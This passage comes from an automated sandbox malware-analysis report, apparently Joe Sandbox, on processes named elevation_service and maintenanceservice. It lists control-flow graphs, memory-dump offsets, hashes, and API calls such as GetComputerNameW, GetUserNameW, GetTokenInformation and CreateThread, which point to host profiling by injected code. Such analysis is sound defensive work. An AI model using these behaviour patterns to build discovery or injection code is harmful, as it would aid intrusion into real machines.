                                                                                                                                                                                                                                      control_flow_graph 400 895b09-895b3b 404 895cff-895d01 400->404 405 895bb4-895ce4 CreateThread 404->405 406 895d07 404->406 410 895cea 405->410 411 895c01-895d41 405->411 406->405 408 895d0d 406->408 410->411 413 895cf0-895cf6 410->413 418 895d4b-895d52 411->418 419 895d43 411->419 413->404 414 895c20-895c68 413->414 420 895d45-895d47 418->420 421 895d54 418->421 419->421 422 895d49 420->422 423 895d5f 420->423 422->418 422->423 424 895d65 423->424 424->424
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction ID: bb57c58341d69bf9b7931122a7abe8f11cf541355909bfcae94595946a5fef62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C01803010EF4E8FDFA776249C182797790FB5133CF2D01AA8487CA0D5DB644905A712

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 425 895b87-895b99 CreateThread 428 895cff-895d01 425->428 429 895bb4-895ce4 CreateThread 428->429 430 895d07 428->430 434 895cea 429->434 435 895c01-895d41 429->435 430->429 432 895d0d 430->432 434->435 437 895cf0-895cf6 434->437 442 895d4b-895d52 435->442 443 895d43 435->443 437->428 438 895c20-895c68 437->438 444 895d45-895d47 442->444 445 895d54 442->445 443->445 446 895d49 444->446 447 895d5f 444->447 446->442 446->447 448 895d65 447->448 448->448
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction ID: 92eeed506218591947deb2788b9174a7c3b880090bf3a39faffa5ea594402def
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBE0863060DB4C4FDF5BAB2498103193AE5FB89324F1D01CEC44AD71D1CB6909058792

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 449 89599b-89599e 450 8959f7 449->450 451 895a02 450->451 453 89597d 451->453 454 8959d4 451->454 453->454 455 89597f-895981 453->455 456 8959d8-8959de 454->456 457 89593b-895a15 call 8b11a0 454->457 458 895983-895a38 455->458 464 895994-89599c 456->464 466 8959e0 456->466 463 895a3e 458->463 458->464 469 895a2c-895a34 463->469 464->451 468 89599e 464->468 466->464 467 8959e2-8959ec 466->467 470 8959ee-8959ef 467->470 471 895a62-895a6e 467->471 468->450 472 8959d9-8959de call 8c2190 469->472 470->458 476 8959f1 call 8c9970 470->476 474 895a70 471->474 475 895a75-895ab3 call 8b1280 471->475 472->464 472->466 474->475 480 895a72 474->480 488 895abb-895ac9 475->488 489 895ab5 475->489 485 8959b8 call 8b0df0 476->485 480->475 490 8959bd-8959c2 call 895d90 485->490 491 895af2-895af5 488->491 489->488 492 895ab7-895ab9 489->492 494 8959c7-8959ce 490->494 505 895adb-895adc 491->505 506 895ad5 491->506 492->488 496 895a1a-895a26 494->496 497 8959d0 494->497 496->469 498 8959a1-8959b5 call 895e10 496->498 497->496 499 8959d2 497->499 498->485 504 895a08-895a0b 498->504 499->472 504->464 509 895a0d 504->509 507 895ae2 505->507 508 895a45-895a46 505->508 506->505 510 895ad7-895ad9 506->510 507->508 511 895ae8 507->511 513 895991 509->513 514 895932 509->514 510->505 511->491 513->514 515 895993 513->515 515->464
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction ID: d441e254b495d976bd43622a6d819cca7cb085ff1e0e483fd6230873194a1c8b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8601D66060DE94CFFF17B71C60553797D92F794338F2C059AA08ACB192C9348D019746

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 516 898090-898096 517 898184 516->517 518 89818c-898192 517->518 519 898186 CloseHandle 517->519 520 898115-898118 518->520 521 898194 518->521 519->518 523 898119-89811a 520->523 524 8980a7 520->524 521->520 522 89819a 521->522 525 89813c 522->525 523->524 526 89811c 523->526 525->517 527 89820f 526->527 528 89808e-898096 527->528 529 898215-89821e 527->529 528->517 528->524 529->528 531 898224 529->531 532 8981d7-8981e6 call 8c715c 531->532 533 898226 531->533 542 898089 532->542 543 8980ca-89810f GetTokenInformation 532->543 533->532 534 898228-8982ee call 895d90 533->534 545 89830c-89831e 534->545 546 8982f0 534->546 542->543 548 89808b 542->548 549 89812d 543->549 550 898111 543->550 552 8982a1-8982ba call 895d90 call 89ec00 545->552 553 898320 545->553 546->545 551 8982f2 546->551 560 89808c 548->560 556 8980a8 549->556 557 898133 549->557 550->549 554 898113 550->554 555 8982f7-8982fc call 895d90 551->555 552->553 553->555 559 898322 553->559 554->520 576 898253-898265 call 8b1280 555->576 577 898302 555->577 561 8980aa-8980ad 556->561 557->525 563 8981ed-8981f0 557->563 559->555 565 898324-898326 559->565 560->528 567 898163-898170 call 8c7164 561->567 568 8980b3-898203 561->568 569 8980da-8980f1 563->569 570 8981f6 563->570 566 898328 565->566 585 8982df-89832b 566->585 586 898335 566->586 567->519 588 898172 567->588 568->567 583 898209 568->583 569->561 570->569 575 8981fc 570->575 581 8981fe-898201 GetTokenInformation 575->581 576->566 596 89826b 576->596 577->576 582 898308-89830a 577->582 581->527 601 8981b7 581->601 582->545 585->586 593 89832d-898331 585->593 590 89826e-898285 586->590 588->518 594 89829b-89829d 590->594 595 898287 590->595 593->586 594->552 599 89824c 595->599 596->590 600 898239 596->600 599->594 603 89824e-898252 599->603 600->566 602 89823f-898243 600->602 601->527 604 8981b9-8981ca 601->604 602->555 602->599 603->590 607 8981d0 604->607 608 8980f3 604->608 607->581 613 8980c3 607->613 608->560 609 8980f5 608->609 609->560 614 898077 609->614 613->581 615 8980c9 613->615 614->532 615->543
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction ID: 699cca085a1703f469e3cb66463c7a2c8f8dd9bca9f549f315e11d0cb0536dac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AC048A162D94BEAAE7936881C1B0B47A54F6037A9B1C048A9C06C1220EE5ACE4351AB

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 616 89817f 617 898184 616->617 618 89818c-898192 617->618 619 898186 CloseHandle 617->619 620 898115-898118 618->620 621 898194 618->621 619->618 623 898119-89811a 620->623 624 8980a7 620->624 621->620 622 89819a 621->622 625 89813c 622->625 623->624 626 89811c 623->626 625->617 627 89820f 626->627 628 89808e-898096 627->628 629 898215-89821e 627->629 628->617 628->624 629->628 631 898224 629->631 632 8981d7-8981e6 call 8c715c 631->632 633 898226 631->633 642 898089 632->642 643 8980ca-89810f GetTokenInformation 632->643 633->632 634 898228-8982ee call 895d90 633->634 645 89830c-89831e 634->645 646 8982f0 634->646 642->643 648 89808b 642->648 649 89812d 643->649 650 898111 643->650 652 8982a1-8982ba call 895d90 call 89ec00 645->652 653 898320 645->653 646->645 651 8982f2 646->651 660 89808c 648->660 656 8980a8 649->656 657 898133 649->657 650->649 654 898113 650->654 655 8982f7-8982fc call 895d90 651->655 652->653 653->655 659 898322 653->659 654->620 676 898253-898265 call 8b1280 655->676 677 898302 655->677 661 8980aa-8980ad 656->661 657->625 663 8981ed-8981f0 657->663 659->655 665 898324-898326 659->665 660->628 667 898163-898170 call 8c7164 661->667 668 8980b3-898203 661->668 669 8980da-8980f1 663->669 670 8981f6 663->670 666 898328 665->666 685 8982df-89832b 666->685 686 898335 666->686 667->619 688 898172 667->688 668->667 683 898209 668->683 669->661 670->669 675 8981fc 670->675 681 8981fe-898201 GetTokenInformation 675->681 676->666 696 89826b 676->696 677->676 682 898308-89830a 677->682 681->627 701 8981b7 681->701 682->645 685->686 693 89832d-898331 685->693 690 89826e-898285 686->690 688->618 694 89829b-89829d 690->694 695 898287 690->695 693->686 694->652 699 89824c 695->699 696->690 700 898239 696->700 699->694 703 89824e-898252 699->703 700->666 702 89823f-898243 700->702 701->627 704 8981b9-8981ca 701->704 702->655 702->699 703->690 707 8981d0 704->707 708 8980f3 704->708 707->681 713 8980c3 707->713 708->660 709 8980f5 708->709 709->660 714 898077 709->714 713->681 715 8980c9 713->715 714->632 715->643
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction ID: 8747528884f426cfd8f6d1bf380858714dcc45cc47751ed77b5ac06a26daf70d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABC092A065850BC75D3836882C0A0B17954F613760F0C4453EC06CA360DE598D4341A2

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:81
                                                                                                                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                                                                                                                      execution_graph 5738 cd55ef 5741 cd55ac 5738->5741 5740 cd55e9 5741->5740 5742 cf3870 5741->5742 5743 cf3876 5742->5743 5745 cf3893 5743->5745 5746 cf3720 5743->5746 5745->5741 5748 ce0c42 5746->5748 5747 cde050 VirtualAlloc 5747->5748 5748->5746 5748->5747 5749 cf37dd 5748->5749 5749->5745 5749->5749 5782 cd5b09 5783 cd5b16 5782->5783 5784 cd5d0d 5783->5784 5785 cd5cdf CreateThread 5783->5785 5786 cd5c01 5785->5786 5787 cd54a0 5785->5787 5750 cd55e4 5752 cd55ac 5750->5752 5751 cf3870 VirtualAlloc 5751->5752 5752->5750 5752->5751 5753 cd55e9 5752->5753 5675 cd5b87 CreateThread 5676 cd5b1c 5675->5676 5682 cd5810 5675->5682 5677 cd5d0d 5676->5677 5678 cd5cdf CreateThread 5676->5678 5679 cd5c01 5678->5679 5680 cd54a0 5678->5680 5681 cd54b5 5680->5681 5683 cd5822 5682->5683 5690 cd5b00 5691 cd5bba 5690->5691 5698 ce52c0 5691->5698 5693 cd5bc7 5697 cd5bde 5693->5697 5703 cf0080 5693->5703 5699 ce52c6 5698->5699 5702 ce52ce 5698->5702 5699->5702 5717 cde050 5699->5717 5702->5693 5709 cf0089 5703->5709 5704 cf03e0 GetComputerNameW 5704->5709 5705 cf0181 VirtualFree 5705->5709 5706 cde050 VirtualAlloc 5706->5709 5707 cf03bf GetUserNameW 5707->5709 5708 cf04d6 GetComputerNameW 5708->5709 5709->5704 5709->5705 5709->5706 5709->5707 5709->5708 5710 cd5c7b 5709->5710 5711 cd8070 5710->5711 5716 cd8075 5711->5716 5712 cd8186 CloseHandle 5712->5716 5713 cd81ad GetTokenInformation 5713->5716 5714 cd80ca GetTokenInformation 5714->5716 5715 cd80a7 5715->5697 5716->5712 5716->5713 5716->5714 5716->5715 5718 cde0c3 5717->5718 5719 cde0d8 VirtualAlloc 5718->5719 5719->5718 5731 cd5860 5732 ce52c0 VirtualAlloc 5731->5732 5733 cd5869 5732->5733 5734 cf0080 5 API calls 5733->5734 5735 cd587d 5734->5735 5736 cd8070 3 API calls 5735->5736 5737 cd5870 5736->5737 5720 cd5b42 5721 cd5b07 5720->5721 5721->5720 5722 cd5cdf CreateThread 5721->5722 5723 cd5b68 5721->5723 5722->5723 5724 cd54a0 5722->5724 5684 cd81b1 5689 cd8075 5684->5689 5685 cd8186 CloseHandle 5685->5689 5686 cd81ad GetTokenInformation 5686->5689 5687 cd80ca GetTokenInformation 5687->5689 5688 cd80a7 5689->5685 5689->5686 5689->5687 5689->5688 5725 cd8090 5730 cd8075 5725->5730 5726 cd8186 CloseHandle 5726->5730 5727 cd80ca GetTokenInformation 5727->5730 5728 cd80a7 5729 cd81ad GetTokenInformation 5729->5730 5730->5726 5730->5727 5730->5728 5730->5729 5754 cd57f0 5755 cd55ac 5754->5755 5756 cd55e9 5755->5756 5757 cf3870 VirtualAlloc 5755->5757 5757->5755

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 290 cd52a0-cd52a5 291 cd532e-cd533f 290->291 292 cd52ab-cd52f5 290->292 296 cd536b-cd5390 291->296 292->291 295 cd52f7 292->295 297 cd53fe 295->297 303 cd53c3 296->303 304 cd5392-cd539a 296->304 299 cd5404-cd540e 297->299 300 d10d4c-d10d4e 297->300 302 cd5424 299->302 305 cd539b 302->305 306 cd542a 302->306 304->305 307 cd539d-cd53a1 305->307 308 cd5413-cd5419 305->308 306->305 309 cd5430-cd5443 306->309 310 cd53a7 307->310 311 cd52b0-cd52b5 307->311 310->311 312 cd53ad 310->312 313 cd53af-cd53f1 312->313 314 cd53f3-cd53f9 312->314 313->308 313->314 314->297 317 cd5322-cd5328 314->317 318 cd532a 317->318 319 cd5355 317->319 318->319 320 cd532c 318->320 322 cd52e8-cd5363 319->322 323 cd52d1-cd52e7 319->323 320->291 326 cd5365 322->326 327 cd53d1-cd53d5 322->327 323->322 326->327 329 cd5367-cd5369 326->329 327->307 328 cd53d7 327->328 331 cd534b 328->331 332 cd5400-cd540e 328->332 329->296 331->332 333 cd5351-cd5353 331->333 332->302 333->319
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00CD53C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction ID: a1710b2ed5386c05852ea9c7e8ae72828403fdd03fcbc91fccc6e0878259c622
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 984128A180DE958FD72A422948643717BD09B223E2F9D04D7D3E3CB3F6D2984D859727

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 cf0080-cf0286 2 cf028c 0->2 3 cf0099-cf0575 0->3 5 cf0445 2->5 7 cf057b 3->7 8 cf0155 3->8 5->3 6 cf044b-cf0457 5->6 9 cf0458-cf0472 GetComputerNameW 6->9 7->8 10 cf0581-cf0587 7->10 11 cf02ef-cf0495 call cde050 * 2 8->11 15 cf03ee-cf03f4 9->15 16 cf024c-cf0253 9->16 13 cf058b 10->13 11->9 52 cf043e 11->52 18 cf058c-cf0591 13->18 19 cf0181 VirtualFree 13->19 38 cf00da-cf023f 15->38 39 cf03fa 15->39 23 cf01e6 16->23 24 cf0255 16->24 21 cf04ab-cf04af 18->21 22 cf0597 18->22 20 cf01a8-cf02ac call d07164 19->20 28 cf02b1-cf02be 20->28 49 cf04c7 21->49 22->21 30 cf059d 22->30 27 cf01ec-cf0313 call d0715c 23->27 23->28 31 cf02d3 24->31 55 cf0318-cf031e 27->55 34 cf03bf-cf03d9 GetUserNameW 28->34 35 cf02c4 28->35 30->21 31->23 37 cf02d9 31->37 44 cf0331 34->44 35->34 45 cf02ca 35->45 37->11 38->16 53 cf0241-cf024a 38->53 39->38 46 cf0400 39->46 50 cf0337 44->50 51 cf0171 44->51 45->31 54 cfb1ee-cfb49f 46->54 61 cf04cc-cf04e6 call d09970 GetComputerNameW 49->61 50->51 58 cf033d 50->58 56 cf013f-cf0146 51->56 57 cf0173 51->57 52->5 53->16 53->28 59 cf0568-cf056b 55->59 60 cf0324 55->60 56->13 62 cf0230 57->62 63 cf05d0-cf05d9 58->63 59->61 60->59 65 cf032a 60->65 69 cf04ec-cf0514 61->69 70 cf0131 61->70 62->49 67 cf0236-cf05c2 62->67 63->54 65->44 67->49 74 cf05c8-cf05c9 67->74 69->59 72 cf0089-cf008c 70->72 73 cf0137 70->73 72->20 76 cf0092 72->76 73->72 77 cf013d 73->77 74->63 76->20 78 cf0098 76->78 77->19 77->56 78->3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction ID: de7ae2bea8f0cd1f3d677937731973d3fdc963722b5b2005cf6e84b8bb98d6e8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D13531418B0D8BC7A8EF58C8457FAB7D1FBA0710F28461FDA56C7166DA749A44C6C3

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 79 cd8070-cd817e 81 cd813d-cd81a5 79->81 82 cd8180 79->82 95 cd81bd-cd81ca 81->95 96 cd81a7 81->96 83 cd815f 82->83 84 cd8184 82->84 83->81 88 cd8161 83->88 85 cd818c-cd8192 84->85 86 cd8186 CloseHandle 84->86 89 cd8115-cd8118 85->89 90 cd8194 85->90 86->85 92 cd8163-cd8170 call d07164 88->92 93 cd8119-cd811a 89->93 94 cd80a7 89->94 90->89 97 cd819a 90->97 92->86 102 cd8172 92->102 93->94 99 cd811c 93->99 107 cd81d0 95->107 108 cd80f3 95->108 100 cd813c 97->100 103 cd820f 99->103 100->84 102->85 105 cd808e-cd8096 103->105 106 cd8215-cd821e 103->106 105->84 105->94 106->105 118 cd8224 106->118 115 cd81fe-cd8201 GetTokenInformation 107->115 116 cd80c3 107->116 109 cd808c 108->109 110 cd80f5 108->110 109->105 110->109 117 cd8077 110->117 115->103 129 cd81b7 115->129 116->115 120 cd80c9 116->120 121 cd81d7-cd81de call d0715c 117->121 118->121 122 cd8226 118->122 124 cd80ca-cd80d8 GetTokenInformation 120->124 127 cd81e3-cd81e6 121->127 122->121 125 cd8228-cd82ee call cd5d90 122->125 128 cd810f 124->128 145 cd830c-cd831e 125->145 146 cd82f0 125->146 127->124 143 cd8089 127->143 131 cd812d 128->131 132 cd8111 128->132 129->103 135 cd81b9-cd81bb 129->135 138 cd80a8 131->138 139 cd8133 131->139 132->131 136 cd8113 132->136 135->95 136->89 141 cd80aa-cd80ad 138->141 139->100 142 cd81ed-cd81f0 139->142 141->92 147 cd80b3-cd8203 141->147 148 cd80da-cd80f1 142->148 149 cd81f6 142->149 143->124 150 cd808b 143->150 154 cd82a1-cd82ba call cd5d90 call cdec00 145->154 155 cd8320 145->155 146->145 151 cd82f2 146->151 147->92 158 cd8209 147->158 148->141 149->148 153 cd81fc 149->153 150->109 156 cd82f7-cd82fc call cd5d90 151->156 153->115 154->155 155->156 160 cd8322 155->160 168 cd8253-cd8265 call cf1280 156->168 169 cd8302 156->169 160->156 163 cd8324-cd8326 160->163 167 cd8328 163->167 174 cd82df-cd832b 167->174 175 cd8335 167->175 168->167 182 cd826b 168->182 169->168 173 cd8308-cd830a 169->173 173->145 174->175 179 cd832d-cd8331 174->179 176 cd826e-cd8285 175->176 180 cd829b-cd829d 176->180 181 cd8287 176->181 179->175 180->154 183 cd824c 181->183 182->176 184 cd8239 182->184 183->180 185 cd824e-cd8252 183->185 184->167 186 cd823f-cd8243 184->186 185->176 186->156 186->183
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction ID: 6ca86fe024f6c18844252e790da2b24cabfc4f0b2cc59f9f263ef4ab3ca4886f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C61667050CA459FC7699B29885433EBBA0FB55350F58065BD72BC33A0DF24AE0E9352

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 187 cd5910-cd5912 188 cd5915-cd5928 call d09970 187->188 189 cd5950-cd5968 187->189 198 cd59b8 call cf0df0 188->198 189->188 191 cd596a 189->191 193 cd592f 191->193 194 cd5970-cd597b 191->194 193->188 197 cd5931-ce072c 193->197 195 cd597d 194->195 196 cd59d4 194->196 195->196 199 cd597f-cd5981 195->199 201 cd59d8 196->201 202 cd593b-cd5a15 call cf11a0 196->202 207 ce0806-ce0809 197->207 208 ce0732-ce0738 197->208 206 cd59bd-cd59c2 call cd5d90 198->206 204 cd5983-cd5a38 199->204 212 cd59d9-cd59de call d02190 201->212 216 cd5a3e 204->216 217 cd5994-cd599c 204->217 219 cd59c7-cd59ce 206->219 222 ce079d-ce07a6 207->222 214 ce073e 208->214 215 ce0800 208->215 212->217 242 cd59e0 212->242 214->215 223 ce0744-ce0774 214->223 215->207 220 ce06b3-ce06b7 215->220 228 cd5a2c-cd5a34 216->228 225 cd599e-cd59f7 217->225 226 cd5a02 217->226 231 cd5a1a-cd5a26 219->231 232 cd59d0 219->232 220->222 227 ce06bd 220->227 229 ce07a8 222->229 230 ce0791-ce0793 222->230 234 ce077a-ce081c 223->234 235 ce06d5-ce06d9 223->235 225->226 226->194 227->222 237 ce06c3-ce07fe 227->237 228->212 229->230 239 ce07aa 229->239 238 ce07ca-ce07cc 230->238 231->228 240 cd59a1-cd59b5 call cd5e10 231->240 232->231 241 cd59d2-cd59de 232->241 234->222 247 ce06df 235->247 248 ce06db 235->248 237->215 239->238 240->198 256 cd5a08-cd5a0b 240->256 241->217 241->242 242->217 243 cd59e2-cd59ec 242->243 249 cd59ee-cd59ef 243->249 250 cd5a62-cd5a6e 243->250 247->222 248->247 252 ce06dd 248->252 249->204 255 cd59f1 249->255 258 cd5a75-cd5ab3 call cf1280 250->258 259 cd5a70 250->259 252->247 257 cec0cc 252->257 255->188 256->217 261 cd5a0d 256->261 263 cec0ce-cec0d0 257->263 264 cec0e8-cec102 257->264 277 cd5abb-cd5ac9 258->277 278 cd5ab5 258->278 259->258 260 cd5a72 259->260 260->258 270 cd5991 261->270 271 cd5932 261->271 266 cec0d2-cec0df 263->266 265 cec104 264->265 264->266 265->266 273 cec0e7 265->273 266->273 270->271 275 cd5993 270->275 275->217 280 cd5af2-cd5af5 277->280 278->277 279 cd5ab7-cd5ab9 278->279 279->277 284 cd5adb-cd5adc 280->284 285 cd5ad5 280->285 287 cd5a45-cd5a46 284->287 288 cd5ae2 284->288 285->284 286 cd5ad7-cd5ad9 285->286 286->284 288->287 289 cd5ae8 288->289 289->280
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction ID: c4d399256493cddb3be92b02f6ab4d0bf39ef011bc765b2ce97f862d48bb6f57
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F1242171CE4C8FC6A9A71D58513BAB3D2EB99310F68029BE25EC3396CD349D469783

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
